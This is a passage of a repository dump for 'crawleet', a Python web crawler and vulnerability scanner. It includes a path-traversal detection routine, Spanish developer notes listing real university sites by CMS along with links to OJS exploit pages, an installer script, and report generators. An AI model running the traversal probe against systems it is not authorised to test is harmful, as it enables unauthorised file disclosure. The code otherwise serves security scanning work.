842 | 		#print('DEBUG: path_traversal ',dirurl)
843 | 		if parseurls.get_extension(dirurl) not in self.blacklist:
844 | 			if self.test_traversal(dirurl):
845 | 				print "VULNERABLE TO PATH TRAVERSAL: ",dirurl
846 | 	
847 | 	def test_traversal(self,dirurl):
848 | 		#print('DEBUG:path_traversal: already tested: ')
849 | 		#print(self.already_tested)
850 | 		#print('DEBUG:path_traversal: testing %s' % dirurl)
851 | 		cve = 'Path traversal'
852 | 		payload = "'"
853 | 		try:
854 | 			orig_resp = self.req.getHTMLCode(dirurl)
855 | 		except Exception as e:
856 | 			return False
857 | 		if orig_resp is None or orig_resp.text is None: return
858 | 		injection_points = parseurls.get_injection_points(dirurl)
859 | 		if injection_points is None: return 
860 | 		for injection_point in injection_points:
861 | 			url_resource,url_to_inject,var_name = injection_point
862 | 			if url_resource not in self.already_tested:
863 | 				self.already_tested[url_resource] = []
864 | 			if var_name not in self.already_tested[url_resource]:
865 | 				print('DEBUG:path_traversal@test :\n[i] trying dotdot: %s' % url_to_inject)
866 | 				for key in self.path_files:
867 | 					# we find those strings that don't appear on orig_resp
868 | 					if self.path_files[key].lower() not in orig_resp.text.lower():
869 | 						for pfx in self.preffixes:
870 | 							for sufx in self.suffixes:
871 | 								#print('[*] inj_ppt: %s' % injection_point)
872 | 								new_url = url_to_inject.replace('{TO_REPLACE}',"%s" % ('%s%s%s'% (pfx,key,sufx)))
873 | 								#print('[*] new_url: %s' % new_url)
874 | 								try:
875 | 									print('[i] testing path traversal: %s ' % new_url) 
876 | 									new_resp = self.req.getHTMLCode(new_url)
877 | 								except Exception as e: pass
878 | 								if (new_resp is not None and 
879 | 									new_resp.text is not None and
880 | 									self.path_files[key].lower() in new_resp.text.lower()
881 | 								):
882 | 									print '*'*(len(cve)+15),'\nVulnerable to %s\n' % cve,'*'*(len(cve)+15)
883 | 									toappend = "[ "+new_url+" ] ====== VULNERABLE TO: "+cve+" ====="
884 | 									if toappend not in self.detections:
885 | 										self.detections.append(new_url)
886 | 										self.already_tested[url_resource].append(var_name)
887 | 										return True
888 | 				self.already_tested[url_resource].append(var_name)
889 | 		return False
890 | 


--------------------------------------------------------------------------------
/detection/vulndetection.pyc:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/truerandom/crawleet/bbaf959920403474426a21f3269dd6a2fe5e09a1/detection/vulndetection.pyc


--------------------------------------------------------------------------------
/docs/notas:
--------------------------------------------------------------------------------
  1 | Problemas y pendientes:
  2 | 	Faltan los modulos:
  3 | 		Magento themes
  4 | 			http://172.16.16.176/magento17/skin/frontend/default/modern/favicon.ico
  5 | 		OJS
  6 | 			https://forum.pkp.sfu.ca/t/security-issue-hacking-via-submission-in-ojs-2-4-8/16382/4
  7 | 			https://bagasunix.blogspot.com/2016/06/cara-deface-web-dengan-teknik-ojs-exploit.html
  8 | 	Parameter scanner:
  9 | 		detection/swdetection.py
 10 | 		Ver como almacenar los resultados
 11 | 	>>>> Si file se deja vacio en el data.xml entonces acepta todo
 12 | 	Indicar cuantos sitios lleva
 13 | 	Los enlaces del sitemap tienen doble diagonal despues del dominio
 14 | 	Intentar leer codigo fuente aun cuando haya un 404
 15 | 	Cambiar el metodo getLinks si se recibe un xhtml no puede parsearlo debido a la instruccion dom=lxml.html.fromString
 16 | 	Ver la puntuacion de joomla
 17 | 	Manejar el CtrlC
 18 | 	El reporte html no reporta todos los archivos encontrados, pej para pued: Con nivel 4 deberia reportar xls pero no lo hace
 19 | 	##############################################################################
 20 | 	Instalar droopescan
 21 | 		pip install droopescan
 22 | 	##############################################################################
 23 | 	###############################################################################
 24 | 	objeto map como atributos tiene 3 listas map absurls y xml
 25 | 	Y como metodos getMap y getUrls getxml
 26 | 	Estos atributos se llenan en sitemap de test
 27 | 	##############################################################################
 28 | 
 29 | 	###############################################################################
 30 | 	Hablar del cmsroot detection
 31 | 	Integracion externa: uso de burp
 32 | 	###############################################################################
 33 | 
 34 | 	################################################################################
 35 | 	SI SE USA EL PROXY ES NECESARIO DESHABILITAR LA VERIFICACION DE LOS CERTIFICADOS
 36 | 	################################################################################
 37 | 
 38 | 	###################################################################################
 39 | 	###############################################################################
 40 | 	Para ver desde donde empezar a lanzar la herramienta externa:
 41 | 		buscar las coincidencias de las carpetas
 42 | 		Por ejemplo wordpress
 43 | 			si esta wp-admin entonces el cms esta a un nivel mas arriba
 44 | 			Ejemplo para wp-admin nivel  = 1
 45 | 			->	cuentadiag = cuento los directorios de wp-admin
 46 | 				cuentacms  = cuentadiag+nivel (en este caso) 
 47 | 			Por lo tanto debo quitar cuentacms diagonales del recurso
 48 | 		Como cada detector tiene una lista de urls (dirs) conocidas:
 49 | 			Solo 1er nivel
 50 | 			Ej para wpress: wpcontent, wpadmin , etc
 51 | 		Puedo buscar estas en las detectadas, si encuentra alguna ->
 52 | 		se que debo empezar desde un nivel mas arriba
 53 | 	###############################################################################
 54 | 
 55 | 	Parece que el metodo de scan fromCode solo busca hasta encontrar la primera aparicion de los
 56 | 	patterns, por el return:
 57 | 	Ejemplo
 58 | 		https://www.becarios.unam.mx/portal/imgs/favicon.ico
 59 | 		Puedo tener una variable local que cheque si hay detecciones, si hay cambio la var a True
 60 | 		Sino no. Al final regreso la variable
 61 | 
 62 | 	###############################################################################
 63 | 	Mejoras
 64 | 		Classycrawler
 65 | 			Bruteforce
 66 | 			Ver como manejar la fuerza bruta, con directorios
 67 | 		Scope:
 68 | 			Si entro por ip y el aplicativo resuelve por dominio, no indexa				<<<
 69 | 
 70 | 	###############################################################################
 71 | 	swdetector
 72 | 		Expresiones para codigo si parentizo -> puedo obtener el valor de lo encontrado
 73 | 	###################################################################################################
 74 | 
 75 | ************************************************************************************************
 76 | Recursos
 77 | Magento
 78 | 	http://www.libros.unam.mx/inicio.html
 79 | 	http://www.ecos.unam.mx/		<<<
 80 | 
 81 | Wordpress
 82 | 	http://webcast.unam.mx
 83 | 	http://www.cepetaxco.unam.mx/es/
 84 | 	http://webcast.unam.mx
 85 | 	http://www.pueg.unam.mx/
 86 | 	http://podcastdgcs.unam.mx/
 87 | 	https://apps.unam.mx/
 88 | 	www.incubadoras.unam.mx
 89 | 	www.generoytiempo.unam.mx
 90 | 	www.educacionintercultural.unam.mx
 91 | 	catedrabullock.muac.unam.mx
 92 | 
 93 | Joomla 
 94 | 	http://computo.matem.unam.mx/
 95 | 
 96 | Drupal
 97 | 	https://www.box.com
 98 | Moodle
 99 | 	http://pudh.pueg.unam.mx/moodle/	<<<
100 | Fingerprint
101 | 	https://github.com/steverobbins/magescan
102 | 
103 | Paginas para hacer lo de los subdominios
104 | 	https://geekflare.com/find-subdomains/
105 | 
106 | Tools:
107 | Magento
108 | 	https://github.com/steverobbins/magescan
109 | Headers
110 | 	https://www.smashingmagazine.com/2017/04/secure-web-app-http-headers/
111 | 


--------------------------------------------------------------------------------
/docs/report.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/truerandom/crawleet/bbaf959920403474426a21f3269dd6a2fe5e09a1/docs/report.png


--------------------------------------------------------------------------------
/linuxinstaller.sh:
--------------------------------------------------------------------------------
 1 | status(){
 2 | 	bar="***********************************************"
 3 | 	if [ "$1" -ne 0 ];then
 4 | 		printf "$bar\nProblem $2\n$bar"
 5 | 	fi
 6 | }
 7 | if [ "$(id -u)" != "0" ]; then
 8 | 	echo "This script needs root"
 9 | 	exit 1
10 | fi
11 | echo "Installing crawleet"
12 | echo "Please wait"
13 | apt-get -qq update
14 | status $? "apt update -y"
15 | apt-get -qq install tor -y
16 | status $? "tor install"
17 | apt-get -qq install graphviz -y
18 | status $? "graphviz install"
19 | apt-get -qq install python-pip -y
20 | status $? "python-pip install"
21 | pip install requests -q
22 | status $? "requests install"
23 | pip install anytree -q
24 | status $? "anytree install"
25 | pip install lxml -q
26 | status $? "lxml install"
27 | mkdir -p /usr/bin/crawleet/
28 | status $? "making dir /usr/bin/crawleet"
29 | cp -r * /usr/bin/crawleet/
30 | status $? "copying data to /usr/bin/crawleet"
31 | ln -s /usr/bin/crawleet/crawleet.py /bin/crawleet
32 | status $? "making link to /bin/crawleet"
33 | chmod +x /bin/crawleet
34 | status $? "applying permissions at /bin/crawleet"
35 | echo "Installation finished"
36 | echo "Use crawleet -h to see options"
37 | 


--------------------------------------------------------------------------------
/reports/.base.css.swp:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/truerandom/crawleet/bbaf959920403474426a21f3269dd6a2fe5e09a1/reports/.base.css.swp


--------------------------------------------------------------------------------
/reports/__init__.py:
--------------------------------------------------------------------------------
1 | 
2 | 


--------------------------------------------------------------------------------
/reports/__init__.pyc:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/truerandom/crawleet/bbaf959920403474426a21f3269dd6a2fe5e09a1/reports/__init__.pyc


--------------------------------------------------------------------------------
/reports/base.css:
--------------------------------------------------------------------------------
  1 | 
  2 | @import "https://fonts.googleapis.com/css?family=Montserrat:400,700|Raleway:300,400";
  3 | /* colors */
  4 | /* tab setting */
  5 | /* breakpoints */
  6 | /* selectors relative to radio inputs */
  7 | html {
  8 |   width: 100%;
  9 |   height: 100%;
 10 | }
 11 | 
 12 | body {
 13 |   background: black;
 14 |   color: #333;
 15 |   font-family: "Raleway";
 16 |   height: 100%;
 17 |   font-size: 13px;
 18 | }
 19 | 
 20 | td {
 21 | 
 22 |   position: relative;
 23 |   background: white;
 24 |   padding: 50px;
 25 |   width: 55%;
 26 |   border-radius: 5px;
 27 |   min-width: 240px;
 28 |   overflow:auto;
 29 | }
 30 | 
 31 | .htext {
 32 |     color: white;
 33 | }
 34 | 
 35 | body h1 {
 36 |   text-align: center;
 37 |   color: #428BFF;
 38 |   font-weight: 300;
 39 |   padding: 40px 0 20px 0;
 40 |   margin: 0;
 41 | }
 42 | 
 43 | body h2 {
 44 |   color: #428BFF;
 45 |   font-weight: 40;
 46 |   margin: 0;
 47 |   font-size: 14;
 48 |   padding: 10px;
 49 | }
 50 | 
 51 | body img {
 52 | 	width: 600;
 53 | }
 54 | 
 55 | img:active {
 56 | 	transform: translateX(-35%) scale(2);
 57 | }
 58 | 
 59 | .tabs {
 60 |   left: 50%;
 61 |   -webkit-transform: translateX(-50%);
 62 |           transform: translateX(-50%);
 63 |   position: relative;
 64 |   background: white;
 65 |   padding: 50px;
 66 |   padding-bottom: 35px;
 67 |   width: 85%;
 68 |   box-shadow: 0 14px 28px rgba(0, 0, 0, 0.25), 0 10px 10px rgba(0, 0, 0, 0.22);
 69 |   border-radius: 5px;
 70 |   min-width: 240px;
 71 |   overflow:auto;
 72 |   display:block;
 73 | }
 74 | 
 75 | .tabs input[name="tab-control"] {
 76 |   display: none;
 77 | }
 78 | 
 79 | .tabs .content section h2,
 80 | .tabs ul li label {
 81 |   font-family: "Montserrat";
 82 |   font-weight: bold;
 83 |   font-size: 14px;
 84 |   color: #428BFF;
 85 | }
 86 | 
 87 | .tabs ul {
 88 |   list-style-type: none;
 89 |   padding-left: 0;
 90 |   display: -webkit-box;
 91 |   display: -ms-flexbox;
 92 |   display: flex;
 93 |   -webkit-box-orient: horizontal;
 94 |   -webkit-box-direction: normal;
 95 |       -ms-flex-direction: row;
 96 |           flex-direction: row;
 97 |   margin-bottom: 10px;
 98 |   -webkit-box-pack: justify;
 99 |       -ms-flex-pack: justify;
100 |           justify-content: space-between;
101 |   -webkit-box-align: end;
102 |       -ms-flex-align: end;
103 |           align-items: flex-end;
104 |   -ms-flex-wrap: wrap;
105 |       flex-wrap: wrap;
106 | }
107 | .tabs ul li {
108 |   box-sizing: border-box;
109 |   -webkit-box-flex: 1;
110 |       -ms-flex: 1;
111 |           flex: 1;
112 |   width: 25%;
113 |   padding: 0 10px;
114 |   text-align: center;
115 | }
116 | .tabs ul li label {
117 |   -webkit-transition: all 0.3s ease-in-out;
118 |   transition: all 0.3s ease-in-out;
119 |   color: #929daf;
120 |   padding: 5px auto;
121 |   overflow: hidden;
122 |   text-overflow: ellipsis;
123 |   display: block;
124 |   cursor: pointer;
125 |   -webkit-transition: all 0.2s ease-in-out;
126 |   transition: all 0.2s ease-in-out;
127 |   white-space: nowrap;
128 |   -webkit-touch-callout: none;
129 |   -webkit-user-select: none;
130 |   -moz-user-select: none;
131 |   -ms-user-select: none;
132 |   user-select: none;
133 | }
134 | 
135 | .tabs ul li label br {
136 |   display: none;
137 | }
138 | 
139 | .tabs ul li label svg {
140 |   fill: #929daf;
141 |   height: 1.2em;
142 |   vertical-align: bottom;
143 |   margin-right: 0.2em;
144 |   -webkit-transition: all 0.2s ease-in-out;
145 |   transition: all 0.2s ease-in-out;
146 | }
147 | 
148 | .tabs ul li label:hover, .tabs ul li label:focus, .tabs ul li label:active {
149 |   outline: 0;
150 |   color: #bec5cf;
151 | }
152 | 
153 | .tabs ul li label:hover svg, .tabs ul li label:focus svg, .tabs ul li label:active svg {
154 |   fill: #bec5cf;
155 | }
156 | 
157 | .tabs .slider {
158 |   position: relative;
159 |   width: 25%;
160 |   -webkit-transition: all 0.33s cubic-bezier(0.38, 0.8, 0.32, 1.07);
161 |   transition: all 0.33s cubic-bezier(0.38, 0.8, 0.32, 1.07);
162 | }
163 | 
164 | .tabs .slider .indicator {
165 |   position: relative;
166 |   width: 50px;
167 |   max-width: 100%;
168 |   margin: 0 auto;
169 |   height: 4px;
170 |   background: #428BFF;
171 |   border-radius: 1px;
172 | }
173 | 
174 | .tabs .content {
175 |   margin-top: 30px;
176 | }
177 | 
178 | .tabs .content section {
179 |   display: none;
180 |   -webkit-animation-name: content;
181 |           animation-name: content;
182 |   -webkit-animation-direction: normal;
183 |           animation-direction: normal;
184 |   -webkit-animation-duration: 0.3s;
185 |           animation-duration: 0.3s;
186 |   -webkit-animation-timing-function: ease-in-out;
187 |           animation-timing-function: ease-in-out;
188 |   -webkit-animation-iteration-count: 1;
189 |           animation-iteration-count: 1;
190 |   line-height: 0.8;
191 | }
192 | .tabs .content section h2 {
193 |   color: #428BFF;
194 |   display: none;
195 | }
196 | 
197 | .tabs .content section h3 {
198 |   color: #428BFF;
199 |   font-weight: 40;
200 |   margin: 0;
201 |   font-size: 14;
202 |   margin-top: 25px;
203 |   left: 1px;
204 | }
205 | 
206 | .tabs .content section h2::after {
207 |   content: "";
208 |   position: relative;
209 |   display: block;
210 |   width: 30px;
211 |   height: 3px;
212 |   background: #428BFF;
213 |   margin-top: 5px;
214 |   left: 1px;
215 | }
216 | 
217 | @-webkit-keyframes content {
218 |   from {
219 |     opacity: 0;
220 |     -webkit-transform: translateY(5%);
221 |             transform: translateY(5%);
222 |   }
223 |   to {
224 |     opacity: 1;
225 |     -webkit-transform: translateY(0%);
226 |             transform: translateY(0%);
227 |   }
228 | }
229 | @keyframes content {
230 |   from {
231 |     opacity: 0;
232 |     -webkit-transform: translateY(5%);
233 |             transform: translateY(5%);
234 |   }
235 |   to {
236 |     opacity: 1;
237 |     -webkit-transform: translateY(0%);
238 |             transform: translateY(0%);
239 |   }
240 | }
241 | 


--------------------------------------------------------------------------------
/reports/reporthtml.py:
--------------------------------------------------------------------------------
  1 | #La estructura basica d	e un bloque de reporte es una lista
  2 | #El primer elemento de esta lista el nombre de los elementos o del detector
  3 | #ejemplo: mailscanner
  4 | #Los demas elementos son las detecciones, ie: [mailscan,mail1,mail2...mailn]
  5 | #Entonces puedo tratar al nombre del detector (elemento) de un modo distinto
  6 | 
  7 | #El segundo metodo recibe 2 cadenas, nombredeladeteccion,resultado
  8 | ########################## REPORTE HTML ###########################
  9 | import os.path
 10 | #import html
 11 | import cgi
 12 | class reporte:
 13 | 	
 14 | 	def __init__(self,domain,fname,template="/base.css"):
 15 | 		self.domain = domain
 16 | 		self.fname = fname+'.html'
 17 | 		self.template = template
 18 | 		# Variable html
 19 | 		self.code = ""
 20 | 		self.scriptlibrary = """
 21 | 		<link rel="stylesheet" href="%s">
 22 | 		<script src="%s"></script>
 23 | 		<script type='text/javascript'>%s</script>
 24 | 		""" % ('https://cdnjs.cloudflare.com/ajax/libs/highlight.js/9.2.0/styles/default.min.css',
 25 | 		'https://cdnjs.cloudflare.com/ajax/libs/highlight.js/9.2.0/highlight.min.js',
 26 | 		'hljs.initHighlightingOnLoad();')
 27 | 		# Agrego el codigo css en el header
 28 | 		self.header1 = """
 29 | 		<html>\n<head>\n<meta charset="utf-8">\n<meta name="viewport" content="width=device-width">
 30 | 		<title>%s</title>%s\n<style>\n""" % (self.domain,self.scriptlibrary)
 31 | 		'''
 32 | 		self.header1 = """
 33 | 		<html>\n<head>\n<meta charset="utf-8">\n<meta name="viewport" content="width=device-width">
 34 | 		<title>%s</title>\n<style>\n""" % (self.domain)
 35 | 		'''
 36 | 		self.header2 = '\n</style>\n</head>\n\n<body>\n<h1>%s</h1>\n<div class="tabs">' % (self.domain)
 37 | 		# Variable para el css
 38 | 		self.css = ''
 39 | 		self.radios = ""
 40 | 		self.uls = "\n<ul>"
 41 | 		self.content = '\n<div class="content">'
 42 | 		self.footer = "</div></div>\n</body>\n</html>"
 43 | 		self.numelems = 0
 44 | 
 45 | 	'''
 46 | 		reslist: 	recursos a reportar (lineas de texto)
 47 | 		tolinks:	booleano para indicar si transformar las lineas a enlaces
 48 | 					Falso por defecto
 49 | 	'''
 50 | 	#def fromList(self,reslist):
 51 | 	# La bandera tolinks sirve para especificar si los elementos pasados 
 52 | 	# como parametros deben convertirse a enlaces html
 53 | 	# la bandera extresult define si los resultados seran puestos en un bloque 
 54 | 	# de codigo
 55 | 	def fromList(self,reslist,tolinks=False,extresults=False):
 56 | 		name = reslist[0]
 57 | 		# reporte txt
 58 | 		#print '\n',name
 59 | 		# css management
 60 | 		if self.numelems == 3 :
 61 | 			#self.radios+='\n<input type="radio" id="tab%s" name="tab-control" checked>' % (self.numelems) 
 62 | 			self.radios+='\n<input type="radio" id="tab%s" name="tab-control" checked>' % (self.numelems) # tab3 como default 
 63 | 		else: 
 64 | 			self.radios+='\n<input type="radio" id="tab%s" name="tab-control">' % (self.numelems) 
 65 | 		# css management
 66 | 		self.uls+='\n<li title="%s"><label for="tab%s" role="button"><br><span>%s</span></label></li>' % (name,self.numelems,name)
 67 | 		self.content+='\n<section>\n<h2>%s</h2>' % (name)
 68 | 		# bloque de codigo
 69 | 		if extresults:
 70 | 			self.content+='\n<pre>\n\t<code class="sh">\n'
 71 | 		for r in reslist[1:]:
 72 | 			if tolinks:
 73 | 				self.content+='<p><a href="%s">%s</a>' % (r,r)
 74 | 			else:
 75 | 				self.content+='<p>%s' % (r)
 76 | 			# reporte txt
 77 | 			#print r
 78 | 		if extresults:
 79 | 			self.content+='\n</code>\n\t</pre>'
 80 | 		self.numelems+=1
 81 | 		self.content+='</section>'
 82 | 
 83 | 	#############################################################
 84 | 	def sitemap(self,mapobj):
 85 | 		name = 'sitemap'
 86 | 		# reporte txt
 87 | 		#print '\n',name
 88 | 		if self.numelems == 0 :
 89 | 			self.radios+='\n<input type="radio" id="tab%s" name="tab-control" checked>' % (self.numelems) 
 90 | 		else: 
 91 | 			self.radios+='\n<input type="radio" id="tab%s" name="tab-control">' % (self.numelems) 
 92 | 		self.uls+='\n<li title="%s"><label for="tab%s" role="button"><br><span>%s</span></label></li>' % (name,self.numelems,name)
 93 | 		self.content+='\n<section>\n<h2>%s</h2>' % (name)
 94 | 		# creo la tabla
 95 | 		self.content+='\n<table>\n<tr>'
 96 | 		self.content+='\n<td>'
 97 | 		# Agrego el sitemap linea a linea
 98 | 		self.content+='\n<pre>\n\t<code>'
 99 | 		reslist = mapobj.getMap()
100 | 		urllist = mapobj.getAbsUrls()
101 | 		#for r in reslist:
102 | 		#	self.content+='<p>%s' % (r)
103 | 		for i in range(0,len(reslist)):
104 | 			self.content+='<p><a href="%s">%s</a>' % (urllist[i],reslist[i])
105 | 			# reporte txt
106 | 			#print r
107 | 		self.content+='\n<p>\n\t</code>\n</pre>'
108 | 		self.content+='\n</td>'
109 | 		# chanfle hace falta pasar la imagen domain.jpg
110 | 		# la clase htext tiene en el css ocultar el texto de relleno
111 | 		# <pre><code><img src="becarios.unam.mx.jpg"></pre></code>
112 | 		self.content+='\n<td class="htext"><pre><code><img src="%s.jpg"></pre></code>' % (self.domain)
113 | 		for i in range(0,len(reslist)-10):
114 | 			self.content+='\n<p>.</p>'
115 | 		self.numelems+=1
116 | 		self.content+='\n</td></tr></table>'
117 | 		self.content+='</section>'
118 | 	
119 | 	def sitemapXML(self,mapobj): pass
120 | 	#############################################################
121 | 	"""
122 | 	def sitemap(self,reslist):
123 | 		name = reslist[0]
124 | 		# reporte txt
125 | 		#print '\n',name
126 | 		if self.numelems == 0 :
127 | 			self.radios+='\n<input type="radio" id="tab%s" name="tab-control" checked>' % (self.numelems) 
128 | 		else: 
129 | 			self.radios+='\n<input type="radio" id="tab%s" name="tab-control">' % (self.numelems) 
130 | 		self.uls+='\n<li title="%s"><label for="tab%s" role="button"><br><span>%s</span></label></li>' % (name,self.numelems,name)
131 | 		self.content+='\n<section>\n<h2>%s</h2>' % (name)
132 | 		# creo la tabla
133 | 		self.content+='\n<table>\n<tr>'
134 | 		self.content+='\n<td>'
135 | 		# Agrego el sitemap linea a linea
136 | 		self.content+='\n<pre>\n\t<code>'
137 | 		for r in reslist[1:]:
138 | 			self.content+='<p>%s' % (r)
139 | 			# reporte txt
140 | 			#print r
141 | 		self.content+='\n<p>\n\t</code>\n</pre>'
142 | 		self.content+='\n</td>'
143 | 		# chanfle hace falta pasar la imagen domain.jpg
144 | 		# la clase htext tiene en el css ocultar el texto de relleno
145 | 		# <pre><code><img src="becarios.unam.mx.jpg"></pre></code>
146 | 		self.content+='\n<td class="htext"><pre><code><img src="%s.jpg"></pre></code>' % (self.domain)
147 | 		for i in range(0,len(reslist)-10):
148 | 			self.content+='\n<p>.</p>'
149 | 		self.numelems+=1
150 | 		self.content+='\n</td></tr></table>'
151 | 		self.content+='</section>'
152 | 	"""
153 | 	"""
154 | 	# nuevo
155 | 	def sitemapXML(self,reslist):
156 | 		pass
157 | 	"""
158 | 	
159 | 	def fromResources(self,resources):
160 | 		name = "Resources"
161 | 		# reporte txt
162 | 		#print '\n',name
163 | 		if self.numelems == 0 :
164 | 			self.radios+='\n<input type="radio" id="tab%s" name="tab-control" checked>' % (self.numelems) 
165 | 		else: 
166 | 			self.radios+='\n<input type="radio" id="tab%s" name="tab-control">' % (self.numelems) 
167 | 		self.uls+='\n<li title="%s"><label for="tab%s" role="button"><br><span>%s</span></label></li>' % (name,self.numelems,name)
168 | 		#######
169 | 		self.content+='\n<section>\n<h2>%s</h2>' % (name)
170 | 		#for r in resources[1:]:
171 | 		for r in resources:
172 | 			self.content+='<p><a href="%s"><h3>%s</a></h3>' % (r.getUrl(),r.getUrl())
173 | 			# reporte txt
174 | 			#print '\n',r.getUrl()
175 | 			#self.content+='<p>Status: %s' % r.getStatus()
176 | 			if r.hasForms():
177 | 				for f in r.getForms():
178 | 					self.content+='<p>Form: %s' % f.action
179 | 					# reporte txt
180 | 					#print "Form: ",f.action
181 | 		self.numelems+=1
182 | 		self.content+='</section>'
183 | 		
184 | 	def fromForms(self,formres):
185 | 		#print "\n","*"*50,"FORM RES","\n"
186 | 		name = "Forms"
187 | 		# reporte txt
188 | 		#print '\n',name
189 | 		if self.numelems == 0 :
190 | 			self.radios+='\n<input type="radio" id="tab%s" name="tab-control" checked>' % (self.numelems) 
191 | 		else: 
192 | 			self.radios+='\n<input type="radio" id="tab%s" name="tab-control">' % (self.numelems) 
193 | 		self.uls+='\n<li title="%s"><label for="tab%s" role="button"><br><span>%s</span></label></li>' % (name,self.numelems,name)
194 | 		#######
195 | 		#self.content+='\n<section>\n<h2>%s</h2>' % (name)
196 | 		self.content+='\n<section>\n<h2>%s</h2>' % (name)
197 | 		#for r in resources[1:]:
198 | 		for r in formres:
199 | 			#print type(r)
200 | 			#print r
201 | 			#print "Metodo con metodo %s atributo %s " % (r.getMethod(),r.method)
202 | 			self.content+='<p><a href="%s"><h3>%s</a></h3>' % (r.getPath(),r.getPath())
203 | 			# reporte txt
204 | 			#print '\n',r.getPath()
205 | 			if r.getName() is not None:
206 | 				self.content+='<p><h3>%s</h3>' % r.getName()
207 | 				# reporte txt
208 | 				#print r.getName()
209 | 			if r.method is not None:
210 | 				#print "Entre al if de method "
211 | 				#print r.method
212 | 				self.content+='<p> %s' % r.method
213 | 				# reporte txt
214 | 				#print '\t',r.method
215 | 			for ctl in r.controls:
216 | 				self.content+='<p>'+cgi.escape('%s'%ctl)
217 | 				# reporte txt
218 | 				#print '\t',ctl
219 | 		self.numelems+=1
220 | 		self.content+='</section>'
221 | 		
222 | 	# Escribe el numero de pestanias utilizadas en el reporte, esto es para poder utilizar el cambio de los tabs
223 | 	def writeCSSX(self):
224 | 		# Agrego el numero de pestanas al css
225 | 		for i in range(1,self.numelems+1):
226 | 			self.css+='\n.tabs input[name="tab-control"]:nth-of-type(%s):checked ~ ul > li:nth-child(%s) > label {cursor: default;color: #428BFF;}'%(i,i)
227 | 			self.css+='\n.tabs input[name="tab-control"]:nth-of-type(%s):checked ~ .content > section:nth-child(%s) {display: block;}'%(i,i)
228 | 		
229 | 	def finish(self):
230 | 		self.uls+='\n</ul>'
231 | 		try:
232 | 			fn = os.path.dirname(__file__)
233 | 			with open(fn+self.template) as basecss:
234 | 				self.css = basecss.read()
235 | 		except Exception as e:
236 | 			print 'Report error: ',e
237 | 		# Agrego los tabs
238 | 		self.writeCSSX()
239 | 		# Escribo el codigo html
240 | 		f = open(self.fname, 'w')
241 | 		f.write(self.header1)
242 | 		f.write(self.css)
243 | 		f.write(self.header2)
244 | 		f.write(self.radios)
245 | 		f.write(self.uls)
246 | 		f.write(self.content)
247 | 		f.write(self.footer)
248 | 


--------------------------------------------------------------------------------
/reports/reporthtml.pyc:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/truerandom/crawleet/bbaf959920403474426a21f3269dd6a2fe5e09a1/reports/reporthtml.pyc


--------------------------------------------------------------------------------
/reports/reportmgr.py:
--------------------------------------------------------------------------------
 1 | #La estructura basica d	e un bloque de reporte es una lista
 2 | #El primer elemento de esta lista el nombre de los elementos o del detector
 3 | #ejemplo: mailscanner
 4 | #Los demas elementos son las detecciones, ie: [mailscan,mail1,mail2...mailn]
 5 | #Entonces puedo tratar al nombre del detector (elemento) de un modo distinto
 6 | 
 7 | #El segundo metodo recibe 2 cadenas, nombredeladeteccion,resultado
 8 | import os.path
 9 | #import html
10 | from reports.reporthtml  import *		# reportes
11 | from reports.reporttxt  import *		# reportes
12 | from reports.reportxml  import *		# reportes
13 | class reportmgr:
14 | 	
15 | 	def __init__(self,domain,fname,formats='txt,html',template="/base.css"):
16 | 		self.domain = domain
17 | 		#self.fname = fname
18 | 		# new
19 | 		self.formats = formats
20 | 		self.reports = []
21 | 		self.initObjects()
22 | 		
23 | 	def initObjects(self):
24 | 		self.formats = self.formats.split(',')
25 | 		if 'txt' in self.formats:
26 | 			rtxt = reportetxt(self.domain,self.domain)
27 | 			self.reports.append(rtxt)
28 | 		if 'html' in self.formats:
29 | 			rhtml = reporte(self.domain,self.domain)
30 | 			self.reports.append(rhtml)
31 | 		if 'xml' in self.formats:
32 | 			rxml = reportexml(self.domain,self.domain)
33 | 			self.reports.append(rxml)
34 | 			
35 | 	"""	
36 | 	def sitemap(self,reslist):
37 | 		for rp in self.reports:
38 | 			rp.sitemap(reslist)
39 | 			
40 | 	def sitemapXML(self,reslist):
41 | 		for rp in self.reports:
42 | 			rp.sitemapXML(reslist)
43 | 	"""
44 | 	
45 | 	############################################
46 | 	def sitemap(self,mapobj):
47 | 		for rp in self.reports:
48 | 			rp.sitemap(mapobj)
49 | 			
50 | 	def sitemapXML(self,mapobj):
51 | 		for rp in self.reports:
52 | 			rp.sitemapXML(mapobj)
53 | 			
54 | 	#############################################			
55 | 	def fromForms(self,formres):
56 | 		for rp in self.reports:
57 | 			rp.fromForms(formres)
58 | 
59 | 	'''
60 | 		reslist: 	recursos a reportar (lineas de texto)
61 | 		tolinks:	booleano para indicar si transformar las lineas a enlaces
62 | 					Falso por defecto
63 | 	'''
64 | 	#def fromList(self,reslist):
65 | 	# La bandera tolinks sirve para especificar si los elementos pasados 
66 | 	# como parametros deben convertirse a enlaces html
67 | 	# la bandera extresult define si los resultados seran puestos en un bloque 
68 | 	# de codigo
69 | 	def fromList(self,reslist,tolinks=False,extresults=False):
70 | 		for rp in self.reports:
71 | 			rp.fromList(reslist,tolinks,extresults)
72 | 	
73 | 	def fromResources(self,resources):
74 | 		for rp in self.reports:
75 | 			rp.fromResources(resources)
76 | 			
77 | 	# Escribe el numero de pestanias utilizadas en el reporte, esto es para poder utilizar el cambio de los tabs
78 | 	def writeCSSX(self):
79 | 		for rp in self.reports:
80 | 			rp.writeCSSX()
81 | 			
82 | 	def finish(self):
83 | 		for rp in self.reports:
84 | 			rp.finish()
85 | 


--------------------------------------------------------------------------------
/reports/reportmgr.pyc:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/truerandom/crawleet/bbaf959920403474426a21f3269dd6a2fe5e09a1/reports/reportmgr.pyc


--------------------------------------------------------------------------------
/reports/reporttxt.py:
--------------------------------------------------------------------------------
  1 | #La estructura basica d	e un bloque de reporte es una lista
  2 | #El primer elemento de esta lista el nombre de los elementos o del detector
  3 | #ejemplo: mailscanner
  4 | #Los demas elementos son las detecciones, ie: [mailscan,mail1,mail2...mailn]
  5 | #Entonces puedo tratar al nombre del detector (elemento) de un modo distinto
  6 | 
  7 | #El segundo metodo recibe 2 cadenas, nombredeladeteccion,resultado
  8 | import os.path
  9 | #import html
 10 | import cgi
 11 | class reportetxt:
 12 | 	
 13 | 	def __init__(self,domain,fname,template="/base.css"):
 14 | 		self.domain = domain
 15 | 		self.fname = fname+'.txt'
